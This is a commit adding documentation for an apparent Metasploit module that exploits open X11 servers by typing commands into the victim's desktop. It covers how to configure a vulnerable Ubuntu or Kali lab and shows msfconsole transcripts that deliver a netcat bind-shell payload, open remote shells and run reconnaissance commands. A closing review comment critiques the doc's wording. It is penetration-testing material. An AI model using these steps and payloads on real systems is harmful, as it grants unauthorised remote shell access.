Land #8286, x11_keyboard_exec docs
commit
ad084ae0cc
@ -0,0 +1,137 @@
## Vulnerable Application

X11 (X Window System) is a graphical windowing system most common on unix/linux.
The service can accept connections from any users when misconfigured which is done with the command `xhost +`.

This exploit has been verified against:

1. Ubuntu 14.04
2. Ubuntu 16.04
3. Kali via Emulation method

This exploit does NOT work against:

1. Solaris 10 Java Desktop System (alt+F2 has no effect)

### Emulation

This can be emulated (on kali) utilizing the following command: `socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0`

### Ubuntu 12.04, 14.04

1. `sudo nano /etc/lightdm/lightdm.conf`
2. Under the `[SeatDefaults]` area, add:

```
xserver-allow-tcp=true
allow-guest=true
```

3. logout or reboot
4. Verification: ```sudo netstat -antp | grep 6000```

```
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
```

5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`

### Ubuntu 16.04

Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`


## Verification Steps

1. Install and configure X11
2. Start msfconsole
3. Do: `use exploit/unix/x11/x11_keyboard_exec`
4. Do: `set rhost [IPs]`
5. Do: `set payload [payload]`
6. Do: `exploit`

## Scenarios

### Ubuntu 14.04

```
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > run

[*] Started bind handler
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application"
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload
[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400

id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
```

### Ubuntu 16.04

```
msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26
rhost => 192.168.2.26
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > exploit

[*] Started bind handler
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application"
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload
[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400

id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
UBUNTU_CODENAME=xenial
```

### Kali via Emulation

```
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(x11_keyboard_exec) > run

[*] Started bind handler
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application"
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload
[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400
```
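Review bot: the opening sentence under "Vulnerable Application" names only `xhost +` as the misconfiguration, but the setup steps show two are required: the X server must be listening on TCP (the `xserver-allow-tcp=true` setting and the netstat check for port 6000) and host-based access control must be disabled with `xhost +`. Suggest stating both in that sentence, since a server with `xhost +` but no TCP listener is not reachable by this module, and the TCP listener alone still rejects unauthorised clients. Two smaller points: step 4 of "Verification Steps" wraps `sudo netstat -antp | grep 6000` in triple backticks inline while every other inline command in the doc uses single backticks; and the setup heading reads "Ubuntu 12.04, 14.04" while the "verified against" list only includes 14.04 and 16.04, so either add 12.04 to that list if it was tested or drop it from the heading.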